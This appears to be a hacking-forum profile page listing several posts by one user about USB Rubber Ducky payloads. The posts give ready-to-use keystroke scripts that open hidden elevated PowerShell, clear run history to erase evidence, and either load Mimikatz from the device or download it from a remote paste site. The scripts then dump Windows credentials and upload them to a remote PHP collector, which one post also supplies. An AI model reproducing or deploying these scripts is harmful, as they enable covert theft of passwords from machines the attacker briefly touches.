
0x41414141

Active Members · Posts: 7 · Days Won: 1

Everything posted by 0x41414141

  1. Here you go.

     <?php
     $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
     file_put_contents($file, file_get_contents("php://input"));
     ?>
  2. Sure, I recommend you install Git to download all the relevant Rubber Ducky code. Once you've installed Git, simply run the following command to clone everything:

     git clone https://github.com/hak5darren/USB-Rubber-Ducky.git

     From there, follow the instructions posted at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky

     The Twin Duck firmware is located in USB-Rubber-Ducky/Firmware/Images/ -- there are several versions, but try c_duck_v2.1.hex. Yes, the last script also cleans up the evidence. If you use the script, make sure you download Invoke-Mimikatz.ps1 and copy/rename it on your Twin Duck as im.ps1. You'll also need to modify the drive volume label to read DUCK.
  3. Here's a version for the Twin Duck. Make sure you leave the ducky plugged in long enough for the creds file to be written in the background.

     DELAY 1000
     GUI r
     DELAY 500
     STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
     ENTER
     DELAY 2000
     ALT y
     DELAY 1000
     STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCK"') do @set duck=%d
     ENTER
     DELAY 500
     STRING if exist %duck%\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
     ENTER
  4. In that case you'll need to flash your firmware to a composite edition (i.e. c_duck_v2.1.hex) to function as a Twin Duck (both a USB drive and HID device). Here is a hybrid script that will work on your current default firmware. It will download the powershell script from a remote web server and save the mimikatz output to the local machine in the %temp% folder.

     DELAY 1000
     GUI r
     DELAY 500
     STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
     ENTER
     DELAY 2000
     ALT y
     DELAY 1000
     STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://paste.ee/r/Xopop');Invoke-Mimikatz -DumpCreds|Out-File '%temp%\mimikatz.txt';"&exit
     ENTER

     I'll follow up with another version for the Twin Duck firmware.
  5. Do you already have a working version of c_duck_v2.1.hex?
  6. I've optimized the Mr. Robot hack to run faster (regardless of web server response times, latency, etc.) and more covertly. Feel free to use the techniques with other payloads. Once the FE (white/yellow) command prompt closes you can remove the rubber ducky and the script will continue to exfiltrate creds in the background.

     DELAY 1000
     GUI r
     DELAY 500
     STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
     ENTER
     DELAY 2000
     ALT y
     DELAY 1000
     STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('https://example.com/rx.php',$o)"&exit
     ENTER